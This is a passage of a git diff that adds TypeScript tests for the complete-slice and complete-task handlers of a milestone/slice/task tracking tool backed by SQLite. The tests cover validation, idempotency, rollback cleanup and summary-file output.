+    assertTrue(sliceAfter!.completed_at !== null, 'completed_at should be set in DB');
+  }
+
+  cleanupDir(basePath);
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-slice: Handler rejects incomplete tasks
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-slice: handler rejects incomplete tasks ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  // Insert milestone, slice, 2 tasks — one complete, one pending
+  insertMilestone({ id: 'M001' });
+  insertSlice({ id: 'S01', milestoneId: 'M001' });
+  insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', status: 'complete', title: 'Task 1' });
+  insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', status: 'pending', title: 'Task 2' });
+
+  const params = makeValidSliceParams();
+  const result = await handleCompleteSlice(params, '/tmp/fake');
+
+  assertTrue('error' in result, 'should return error when tasks are incomplete');
+  if ('error' in result) {
+    assertMatch(result.error, /incomplete tasks/, 'error should mention incomplete tasks');
+    assertMatch(result.error, /T02/, 'error should mention the specific incomplete task ID');
+  }
+
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-slice: Handler rejects no tasks
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-slice: handler rejects no tasks ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  // Insert milestone and slice but NO tasks
+  insertMilestone({ id: 'M001' });
+  insertSlice({ id: 'S01', milestoneId: 'M001' });
+
+  const params = makeValidSliceParams();
+  const result = await handleCompleteSlice(params, '/tmp/fake');
+
+  assertTrue('error' in result, 'should return error when no tasks exist');
+  if ('error' in result) {
+    assertMatch(result.error, /no tasks found/, 'error should say no tasks found');
+  }
+
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-slice: Handler validation errors
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-slice: handler validation errors ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  const params = makeValidSliceParams();
+
+  // Empty sliceId
+  const r1 = await handleCompleteSlice({ ...params, sliceId: '' }, '/tmp/fake');
+  assertTrue('error' in r1, 'should return error for empty sliceId');
+  if ('error' in r1) {
+    assertMatch(r1.error, /sliceId/, 'error should mention sliceId');
+  }
+
+  // Empty milestoneId
+  const r2 = await handleCompleteSlice({ ...params, milestoneId: '' }, '/tmp/fake');
+  assertTrue('error' in r2, 'should return error for empty milestoneId');
+  if ('error' in r2) {
+    assertMatch(r2.error, /milestoneId/, 'error should mention milestoneId');
+  }
+
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-slice: Handler idempotency
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-slice: handler idempotency ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  const { basePath, roadmapPath } = createTempProject();
+
+  // Set up DB state
+  insertMilestone({ id: 'M001' });
+  insertSlice({ id: 'S01', milestoneId: 'M001' });
+  insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', status: 'complete', title: 'Task 1' });
+
+  const params = makeValidSliceParams();
+
+  // First call
+  const r1 = await handleCompleteSlice(params, basePath);
+  assertTrue(!('error' in r1), 'first call should succeed');
+
+  // Second call — state machine guard rejects (slice is already complete)
+  const r2 = await handleCompleteSlice(params, basePath);
+  assertTrue('error' in r2, 'second call should return error (slice already complete)');
+  if ('error' in r2) {
+    assertMatch(r2.error, /already complete/, 'error should mention already complete');
+  }
+
+  // Verify only 1 slice row (not duplicated)
+  const adapter = _getAdapter()!;
+  const sliceRows = adapter.prepare("SELECT * FROM slices WHERE milestone_id = 'M001' AND id = 'S01'").all();
+  assertEq(sliceRows.length, 1, 'should have exactly 1 slice row after calls');
+
+  cleanupDir(basePath);
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-slice: Handler with missing roadmap (graceful)
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-slice: handler with missing roadmap ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  // Create a temp dir WITHOUT a roadmap file
+  const basePath = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-no-roadmap-'));
+  const sliceDir = path.join(basePath, '.gsd', 'milestones', 'M001', 'slices', 'S01');
+  fs.mkdirSync(sliceDir, { recursive: true });
+
+  // Set up DB state
+  insertMilestone({ id: 'M001' });
+  insertSlice({ id: 'S01', milestoneId: 'M001' });
+  insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', status: 'complete', title: 'Task 1' });
+
+  const params = makeValidSliceParams();
+  const result = await handleCompleteSlice(params, basePath);
+
+  // Should succeed even without roadmap file — just skip checkbox toggle
+  assertTrue(!('error' in result), 'handler should succeed without roadmap file');
+  if (!('error' in result)) {
+    assertTrue(fs.existsSync(result.summaryPath), 'summary should be written even without roadmap');
+    assertTrue(fs.existsSync(result.uatPath), 'UAT should be written even without roadmap');
+  }
+
+  cleanupDir(basePath);
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-slice: step 13 specifies write tool for PROJECT.md (#2946)
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-slice: step 13 specifies write tool for PROJECT.md (#2946) ===');
+{
+  const promptPath = path.join(
+    path.dirname(new URL(import.meta.url).pathname),
+    '..', 'prompts', 'complete-slice.md',
+  );
+  const prompt = fs.readFileSync(promptPath, 'utf-8');
+
+  // Step 13 must explicitly name the `write` tool so the LLM doesn't
+  // confuse it with `edit` (which requires path + oldText + newText).
+  // See: https://github.com/gsd-build/gsd-2/issues/2946
+  const mentionsWriteTool =
+    /PROJECT\.md.*\bwrite\b/i.test(prompt) ||
+    /\bwrite\b.*PROJECT\.md/i.test(prompt);
+  assertTrue(mentionsWriteTool, 'step 13 must name the `write` tool when updating PROJECT.md');
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+
+report();
diff --git a/src/resources/extensions/gsd/tests/complete-task-normalize-lists.test.ts b/src/resources/extensions/gsd/tests/complete-task-normalize-lists.test.ts
new file mode 100644
index 000000000..5f8044b68
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/complete-task-normalize-lists.test.ts
@@ -0,0 +1,54 @@
+/**
+ * Regression test for #3692 — normalizeListParam in complete-task
+ *
+ * Agents sometimes pass keyFiles/keyDecisions as comma-separated strings
+ * instead of arrays.  normalizeListParam coerces both forms to string[].
+ *
+ * Also verifies roadmap-slices.ts detects dependency column from header.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const completeTaskSrc = readFileSync(
+  join(__dirname, '..', 'tools', 'complete-task.ts'),
+  'utf-8',
+);
+const roadmapSlicesSrc = readFileSync(
+  join(__dirname, '..', 'roadmap-slices.ts'),
+  'utf-8',
+);
+
+describe('complete-task normalizeListParam (#3692)', () => {
+  test('normalizeListParam function is defined', () => {
+    assert.match(completeTaskSrc, /function normalizeListParam\(/,
+      'normalizeListParam function should be defined in complete-task.ts');
+  });
+
+  test('normalizeListParam is applied to keyFiles', () => {
+    assert.match(completeTaskSrc, /normalizeListParam\(params\.keyFiles\)/,
+      'normalizeListParam should be applied to keyFiles');
+  });
+
+  test('normalizeListParam is applied to keyDecisions', () => {
+    assert.match(completeTaskSrc, /normalizeListParam\(params\.keyDecisions\)/,
+      'normalizeListParam should be applied to keyDecisions');
+  });
+});
+
+describe('roadmap-slices depColumnIndex detection (#3692)', () => {
+  test('depColumnIndex is detected from header row', () => {
+    assert.match(roadmapSlicesSrc, /depColumnIndex/,
+      'depColumnIndex variable should exist in roadmap-slices.ts');
+    assert.match(roadmapSlicesSrc, /headerCells/,
+      'headerCells should be parsed from the header row');
+    assert.match(roadmapSlicesSrc, /depends|deps|depend/i,
+      'header detection should match depends/deps/depend');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/complete-task-rollback-evidence.test.ts b/src/resources/extensions/gsd/tests/complete-task-rollback-evidence.test.ts
new file mode 100644
index 000000000..720f6211d
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/complete-task-rollback-evidence.test.ts
@@ -0,0 +1,106 @@
+import { describe, it, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { randomUUID } from "node:crypto";
+
+import { handleCompleteTask } from "../tools/complete-task.js";
+import {
+  openDatabase,
+  closeDatabase,
+  _getAdapter,
+  insertMilestone,
+  insertSlice,
+} from "../gsd-db.js";
+import { clearPathCache } from "../paths.js";
+import { clearParseCache } from "../files.js";
+
+function makeTmpBase(): string {
+  const base = join(tmpdir(), `gsd-ct-rollback-${randomUUID()}`);
+  // Create the full tasks directory so the success path works
+  mkdirSync(join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks"), { recursive: true });
+  return base;
+}
+
+const VALID_PARAMS = {
+  milestoneId: "M001",
+  sliceId: "S01",
+  taskId: "T01",
+  oneLiner: "Test task",
+  narrative: "Did the thing",
+  verification: "Checked it",
+  deviations: "None.",
+  knownIssues: "None.",
+  keyFiles: ["src/foo.ts"],
+  keyDecisions: ["Used approach A"],
+  blockerDiscovered: false,
+  verificationEvidence: [
+    { command: "npm test", exitCode: 0, verdict: "✅ pass", durationMs: 1000 },
+    { command: "npm run lint", exitCode: 0, verdict: "✅ pass", durationMs: 500 },
+  ],
+};
+
+describe("complete-task rollback cleans up verification_evidence (#2724)", () => {
+  let base: string;
+
+  afterEach(() => {
+    clearPathCache();
+    clearParseCache();
+    try { closeDatabase(); } catch { /* */ }
+    if (base) {
+      try { rmSync(base, { recursive: true, force: true }); } catch { /* */ }
+    }
+  });
+
+  it("inserts verification_evidence rows on success", async () => {
+    base = makeTmpBase();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+
+    // Write a minimal slice plan so renderPlanCheckboxes doesn't error
+    writeFileSync(
+      join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md"),
+      "# S01 Plan\n\n## Tasks\n\n- [ ] **T01: Test task**\n",
+    );
+
+    const result = await handleCompleteTask(VALID_PARAMS, base);
+    assert.ok(!("error" in result), `unexpected error: ${"error" in result ? result.error : ""}`);
+
+    const adapter = _getAdapter()!;
+    const rows = adapter.prepare(
+      `SELECT * FROM verification_evidence WHERE task_id = 'T01' AND slice_id = 'S01' AND milestone_id = 'M001'`,
+    ).all();
+    assert.equal(rows.length, 2, "should have 2 evidence rows after success");
+  });
+
+  it("deletes verification_evidence rows on disk-render rollback", async () => {
+    base = makeTmpBase();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+
+    // Replace the tasks directory with a file so disk write fails (cross-platform)
+    const tasksDir = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks");
+    rmSync(tasksDir, { recursive: true, force: true });
+    writeFileSync(tasksDir, "not-a-directory");
+
+    const result = await handleCompleteTask(VALID_PARAMS, base);
+    assert.ok("error" in result, "should return error when disk write fails");
+
+    // Task should be rolled back to pending
+    const adapter = _getAdapter()!;
+    const task = adapter.prepare(
+      `SELECT status FROM tasks WHERE milestone_id = 'M001' AND slice_id = 'S01' AND id = 'T01'`,
+    ).get() as { status: string } | undefined;
+    assert.ok(task, "task row should still exist");
+    assert.equal(task!.status, "pending", "task status should be rolled back to pending");
+
+    // Verification evidence should be cleaned up — no orphaned rows
+    const evidenceRows = adapter.prepare(
+      `SELECT * FROM verification_evidence WHERE task_id = 'T01' AND slice_id = 'S01' AND milestone_id = 'M001'`,
+    ).all();
+    assert.equal(evidenceRows.length, 0, "verification_evidence should be empty after rollback");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/complete-task.test.ts b/src/resources/extensions/gsd/tests/complete-task.test.ts
new file mode 100644
index 000000000..c65f1ff05
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/complete-task.test.ts
@@ -0,0 +1,493 @@
+import { createTestContext } from './test-helpers.ts';
+import * as fs from 'node:fs';
+import * as path from 'node:path';
+import * as os from 'node:os';
+import {
+  openDatabase,
+  closeDatabase,
+  transaction,
+  _getAdapter,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  updateTaskStatus,
+  getTask,
+  getSliceTasks,
+  insertVerificationEvidence,
+} from '../gsd-db.ts';
+import { handleCompleteTask } from '../tools/complete-task.ts';
+
+const { assertEq, assertTrue, assertMatch, report } = createTestContext();
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Helpers
+// ═══════════════════════════════════════════════════════════════════════════
+
+function tempDbPath(): string {
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-complete-task-'));
+  return path.join(dir, 'test.db');
+}
+
+function cleanup(dbPath: string): void {
+  closeDatabase();
+  try {
+    const dir = path.dirname(dbPath);
+    for (const f of fs.readdirSync(dir)) {
+      fs.unlinkSync(path.join(dir, f));
+    }
+    fs.rmdirSync(dir);
+  } catch {
+    // best effort
+  }
+}
+
+function cleanupDir(dirPath: string): void {
+  try {
+    fs.rmSync(dirPath, { recursive: true, force: true });
+  } catch {
+    // best effort
+  }
+}
+
+/**
+ * Create a temp project directory with .gsd structure for handler tests.
+ */
+function createTempProject(): { basePath: string; planPath: string } {
+  const basePath = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-handler-'));
+  const tasksDir = path.join(basePath, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'tasks');
+  fs.mkdirSync(tasksDir, { recursive: true });
+
+  const planPath = path.join(basePath, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md');
+  fs.writeFileSync(planPath, `# S01: Test Slice
+
+## Tasks
+
+- [ ] **T01: Test task** \`est:30m\`
+  - Do: Implement the thing
+  - Verify: Run tests
+
+- [ ] **T02: Second task** \`est:1h\`
+  - Do: Implement more
+  - Verify: Run more tests
+`);
+
+  return { basePath, planPath };
+}
+
+function makeValidParams() {
+  return {
+    taskId: 'T01',
+    sliceId: 'S01',
+    milestoneId: 'M001',
+    oneLiner: 'Added test functionality',
+    narrative: 'Implemented the test feature with full coverage.',
+    verification: 'Ran npm run test:unit — all tests pass.',
+    deviations: 'None.',
+    knownIssues: 'None.',
+    keyFiles: ['src/test.ts', 'src/test.test.ts'],
+    keyDecisions: ['D001'],
+    blockerDiscovered: false,
+    verificationEvidence: [
+      {
+        command: 'npm run test:unit',
+        exitCode: 0,
+        verdict: '✅ pass',
+        durationMs: 5000,
+      },
+    ],
+  };
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-task: Schema v5 migration
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-task: schema v5 migration ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  const adapter = _getAdapter()!;
+
+  // Verify schema version is current (v14 after indexes + slice_dependencies)
+  const versionRow = adapter.prepare('SELECT MAX(version) as v FROM schema_version').get();
+  assertEq(versionRow?.['v'], 14, 'schema version should be 14');
+
+  // Verify all 4 new tables exist
+  const tables = adapter.prepare(
+    "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name"
+  ).all();
+  const tableNames = tables.map(t => t['name'] as string);
+  assertTrue(tableNames.includes('milestones'), 'milestones table should exist');
+  assertTrue(tableNames.includes('slices'), 'slices table should exist');
+  assertTrue(tableNames.includes('tasks'), 'tasks table should exist');
+  assertTrue(tableNames.includes('verification_evidence'), 'verification_evidence table should exist');
+
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-task: Accessor CRUD
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-task: accessor CRUD ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  // Insert milestone
+  insertMilestone({ id: 'M001', title: 'Test Milestone' });
+  const adapter = _getAdapter()!;
+  const mRow = adapter.prepare("SELECT * FROM milestones WHERE id = 'M001'").get();
+  assertEq(mRow?.['id'], 'M001', 'milestone id should be M001');
+  assertEq(mRow?.['title'], 'Test Milestone', 'milestone title should match');
+
+  // Insert slice
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice', risk: 'high' });
+  const sRow = adapter.prepare("SELECT * FROM slices WHERE id = 'S01' AND milestone_id = 'M001'").get();
+  assertEq(sRow?.['id'], 'S01', 'slice id should be S01');
+  assertEq(sRow?.['risk'], 'high', 'slice risk should be high');
+
+  // Insert task with all fields
+  insertTask({
+    id: 'T01',
+    sliceId: 'S01',
+    milestoneId: 'M001',
+    title: 'Test Task',
+    status: 'complete',
+    oneLiner: 'Did the thing',
+    narrative: 'Full story here.',
+    verificationResult: 'passed',
+    duration: '30m',
+    blockerDiscovered: false,
+    deviations: 'None',
+    knownIssues: 'None',
+    keyFiles: ['file1.ts', 'file2.ts'],
+    keyDecisions: ['D001'],
+    fullSummaryMd: '# Summary',
+  });
+
+  // getTask verifies all fields
+  const task = getTask('M001', 'S01', 'T01');
+  assertTrue(task !== null, 'task should not be null');
+  assertEq(task!.id, 'T01', 'task id');
+  assertEq(task!.slice_id, 'S01', 'task slice_id');
+  assertEq(task!.milestone_id, 'M001', 'task milestone_id');
+  assertEq(task!.title, 'Test Task', 'task title');
+  assertEq(task!.status, 'complete', 'task status');
+  assertEq(task!.one_liner, 'Did the thing', 'task one_liner');
+  assertEq(task!.narrative, 'Full story here.', 'task narrative');
+  assertEq(task!.verification_result, 'passed', 'task verification_result');
+  assertEq(task!.blocker_discovered, false, 'task blocker_discovered');
+  assertEq(task!.key_files, ['file1.ts', 'file2.ts'], 'task key_files JSON round-trip');
+  assertEq(task!.key_decisions, ['D001'], 'task key_decisions JSON round-trip');
+  assertEq(task!.full_summary_md, '# Summary', 'task full_summary_md');
+
+  // getTask returns null for non-existent
+  const noTask = getTask('M001', 'S01', 'T99');
+  assertEq(noTask, null, 'non-existent task should return null');
+
+  // Insert verification evidence
+  insertVerificationEvidence({
+    taskId: 'T01',
+    sliceId: 'S01',
+    milestoneId: 'M001',
+    command: 'npm test',
+    exitCode: 0,
+    verdict: '✅ pass',
+    durationMs: 3000,
+  });
+  const evRows = adapter.prepare(
+    "SELECT * FROM verification_evidence WHERE task_id = 'T01' AND slice_id = 'S01' AND milestone_id = 'M001'"
+  ).all();
+  assertEq(evRows.length, 1, 'should have 1 verification evidence row');
+  assertEq(evRows[0]['command'], 'npm test', 'evidence command');
+  assertEq(evRows[0]['exit_code'], 0, 'evidence exit_code');
+  assertEq(evRows[0]['verdict'], '✅ pass', 'evidence verdict');
+  assertEq(evRows[0]['duration_ms'], 3000, 'evidence duration_ms');
+
+  // getSliceTasks returns array
+  const sliceTasks = getSliceTasks('M001', 'S01');
+  assertEq(sliceTasks.length, 1, 'getSliceTasks should return 1 task');
+  assertEq(sliceTasks[0].id, 'T01', 'getSliceTasks first task id');
+
+  // updateTaskStatus changes status
+  updateTaskStatus('M001', 'S01', 'T01', 'failed', new Date().toISOString());
+  const updatedTask = getTask('M001', 'S01', 'T01');
+  assertEq(updatedTask!.status, 'failed', 'task status should be updated to failed');
+  assertTrue(updatedTask!.completed_at !== null, 'completed_at should be set after status update');
+
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-task: Accessor stale-state error
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-task: accessor stale-state error ===');
+{
+  // No DB open — accessors should throw GSD_STALE_STATE
+  closeDatabase();
+  let threw = false;
+  try {
+    insertMilestone({ id: 'M001' });
+  } catch (err: any) {
+    threw = true;
+    assertTrue(err.code === 'GSD_STALE_STATE' || err.message.includes('No database open'),
+      'should throw GSD_STALE_STATE when no DB open');
+  }
+  assertTrue(threw, 'insertMilestone should throw when no DB open');
+
+  threw = false;
+  try {
+    insertSlice({ id: 'S01', milestoneId: 'M001' });
+  } catch (err: any) {
+    threw = true;
+    assertTrue(err.code === 'GSD_STALE_STATE' || err.message.includes('No database open'),
+      'insertSlice should throw GSD_STALE_STATE');
+  }
+  assertTrue(threw, 'insertSlice should throw when no DB open');
+
+  threw = false;
+  try {
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001' });
+  } catch (err: any) {
+    threw = true;
+    assertTrue(err.code === 'GSD_STALE_STATE' || err.message.includes('No database open'),
+      'insertTask should throw GSD_STALE_STATE');
+  }
+  assertTrue(threw, 'insertTask should throw when no DB open');
+
+  threw = false;
+  try {
+    insertVerificationEvidence({
+      taskId: 'T01', sliceId: 'S01', milestoneId: 'M001',
+      command: 'test', exitCode: 0, verdict: 'pass', durationMs: 0,
+    });
+  } catch (err: any) {
+    threw = true;
+    assertTrue(err.code === 'GSD_STALE_STATE' || err.message.includes('No database open'),
+      'insertVerificationEvidence should throw GSD_STALE_STATE');
+  }
+  assertTrue(threw, 'insertVerificationEvidence should throw when no DB open');
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-task: Handler happy path
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-task: handler happy path ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  const { basePath, planPath } = createTempProject();
+
+  // Seed milestone + slice + both tasks so projection renders T01 ([x]) and T02 ([ ])
+  insertMilestone({ id: 'M001', title: 'Test Milestone' });
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice' });
+  insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', status: 'pending', title: 'Second task' });
+
+  const params = makeValidParams();
+  const result = await handleCompleteTask(params, basePath);
+
+  assertTrue(!('error' in result), 'handler should succeed without error');
+  if (!('error' in result)) {
+    assertEq(result.taskId, 'T01', 'result taskId');
+    assertEq(result.sliceId, 'S01', 'result sliceId');
+    assertEq(result.milestoneId, 'M001', 'result milestoneId');
+    assertTrue(result.summaryPath.endsWith('T01-SUMMARY.md'), 'summaryPath should end with T01-SUMMARY.md');
+
+    // (a) Verify task row in DB with status 'complete'
+    const task = getTask('M001', 'S01', 'T01');
+    assertTrue(task !== null, 'task should exist in DB after handler');
+    assertEq(task!.status, 'complete', 'task status should be complete');
+    assertEq(task!.one_liner, 'Added test functionality', 'task one_liner in DB');
+    assertEq(task!.key_files, ['src/test.ts', 'src/test.test.ts'], 'task key_files in DB');
+
+    // (b) Verify verification_evidence rows in DB
+    const adapter = _getAdapter()!;
+    const evRows = adapter.prepare(
+      "SELECT * FROM verification_evidence WHERE task_id = 'T01' AND milestone_id = 'M001'"
+    ).all();
+    assertEq(evRows.length, 1, 'should have 1 verification evidence row after handler');
+    assertEq(evRows[0]['command'], 'npm run test:unit', 'evidence command from handler');
+
+    // (c) Verify T01-SUMMARY.md file on disk with correct YAML frontmatter
+    assertTrue(fs.existsSync(result.summaryPath), 'summary file should exist on disk');
+    const summaryContent = fs.readFileSync(result.summaryPath, 'utf-8');
+    assertMatch(summaryContent, /^---\n/, 'summary should start with YAML frontmatter');
+    assertMatch(summaryContent, /id: T01/, 'summary should contain id: T01');
+    assertMatch(summaryContent, /parent: S01/, 'summary should contain parent: S01');
+    assertMatch(summaryContent, /milestone: M001/, 'summary should contain milestone: M001');
+    assertMatch(summaryContent, /blocker_discovered: false/, 'summary should contain blocker_discovered');
+    assertMatch(summaryContent, /# T01:/, 'summary should have H1 with task ID');
+    assertMatch(summaryContent, /\*\*Added test functionality\*\*/, 'summary should have one-liner in bold');
+    assertMatch(summaryContent, /## What Happened/, 'summary should have What Happened section');
+    assertMatch(summaryContent, /## Verification Evidence/, 'summary should have Verification Evidence section');
+    assertMatch(summaryContent, /npm run test:unit/, 'summary evidence should contain command');
+
+    // (d) Verify plan checkbox changed to [x]
+    const planContent = fs.readFileSync(planPath, 'utf-8');
+    assertMatch(planContent, /\[x\]\s+\*\*T01:/, 'T01 should be checked in plan');
+    // T02 should still be unchecked
+    assertMatch(planContent, /\[ \]\s+\*\*T02:/, 'T02 should still be unchecked in plan');
+
+    // (e) Verify full_summary_md stored in DB for D004 recovery
+    const taskAfter = getTask('M001', 'S01', 'T01');
+    assertTrue(taskAfter!.full_summary_md.length > 0, 'full_summary_md should be non-empty in DB');
+    assertMatch(taskAfter!.full_summary_md, /id: T01/, 'full_summary_md should contain frontmatter');
+  }
+
+  cleanupDir(basePath);
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-task: Handler validation errors
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-task: handler validation errors ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  const params = makeValidParams();
+
+  // Empty taskId
+  const r1 = await handleCompleteTask({ ...params, taskId: '' }, '/tmp/fake');
+  assertTrue('error' in r1, 'should return error for empty taskId');
+  if ('error' in r1) {
+    assertMatch(r1.error, /taskId/, 'error should mention taskId');
+  }
+
+  // Empty milestoneId
+  const r2 = await handleCompleteTask({ ...params, milestoneId: '' }, '/tmp/fake');
+  assertTrue('error' in r2, 'should return error for empty milestoneId');
+  if ('error' in r2) {
+    assertMatch(r2.error, /milestoneId/, 'error should mention milestoneId');
+  }
+
+  // Empty sliceId
+  const r3 = await handleCompleteTask({ ...params, sliceId: '' }, '/tmp/fake');
+  assertTrue('error' in r3, 'should return error for empty sliceId');
+  if ('error' in r3) {
+    assertMatch(r3.error, /sliceId/, 'error should mention sliceId');
+  }
+
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-task: Handler idempotency
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-task: handler idempotency ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  const { basePath, planPath } = createTempProject();
+
+  // Seed milestone + slice so state machine guards pass
+  insertMilestone({ id: 'M001', title: 'Test Milestone' });
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice' });
+
+  const params = makeValidParams();
+
+  // First call should succeed
+  const r1 = await handleCompleteTask(params, basePath);
+  assertTrue(!('error' in r1), 'first call should succeed');
+
+  // Verify only 1 task row
+  const tasks = getSliceTasks('M001', 'S01');
+  assertEq(tasks.length, 1, 'should have exactly 1 task row after first call');
+
+  // Second call with same params — state machine guard rejects (task is already complete)
+  const r2 = await handleCompleteTask(params, basePath);
+  assertTrue('error' in r2, 'second call should return error (task already complete)');
+  if ('error' in r2) {
+    assertMatch(r2.error, /already complete/, 'error should mention already complete');
+  }
+
+  // Still only 1 task row (no duplication from rejected second call)
+  const tasksAfter = getSliceTasks('M001', 'S01');
+  assertEq(tasksAfter.length, 1, 'should still have exactly 1 task row after rejected second call');
+
+  cleanupDir(basePath);
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-task: Handler with missing plan file (graceful)
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-task: handler with missing plan file ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  // Create a temp dir WITHOUT a plan file
+  const basePath = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-no-plan-'));
+  const tasksDir = path.join(basePath, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'tasks');
+  fs.mkdirSync(tasksDir, { recursive: true });
+
+  // Seed milestone + slice so state machine guards pass
+  insertMilestone({ id: 'M001', title: 'Test Milestone' });
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice' });
+
+  const params = makeValidParams();
+  const result = await handleCompleteTask(params, basePath);
+
+  // Should succeed even without plan file — just skip checkbox toggle
+  assertTrue(!('error' in result), 'handler should succeed without plan file');
+  if (!('error' in result)) {
+    assertTrue(fs.existsSync(result.summaryPath), 'summary should be written even without plan file');
+  }
+
+  cleanupDir(basePath);
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-task: minimal params — no optional fields (#2771 regression)
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-task: minimal params (no keyFiles, keyDecisions, verificationEvidence, blockerDiscovered) ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  const { basePath, planPath } = createTempProject();
+
+  insertMilestone({ id: 'M001', title: 'Test Milestone' });
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice' });
+
+  // Minimal params — only required fields, all optional enrichment fields omitted
+  const minimalParams = {
+    taskId: 'T01',
+    sliceId: 'S01',
+    milestoneId: 'M001',
+    oneLiner: 'Basic task',
+    narrative: 'Did the work.',
+    verification: 'Looks good.',
+    // keyFiles, keyDecisions, verificationEvidence, blockerDiscovered intentionally omitted
+  };
+
+  const result = await handleCompleteTask(minimalParams as any, basePath);
+
+  assertTrue(!('error' in result), 'handler should not crash with minimal params (no optional fields)');
+  if (!('error' in result)) {
+    assertTrue(fs.existsSync(result.summaryPath), 'summary file should be written with minimal params');
+    const summaryContent = fs.readFileSync(result.summaryPath, 'utf-8');
+    assertMatch(summaryContent, /blocker_discovered:\s*false/, 'blocker_discovered should default to false');
+    assertMatch(summaryContent, /\(none\)/, 'key_files/key_decisions should show (none) placeholder');
+  }
+
+  cleanupDir(basePath);
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+
+report();
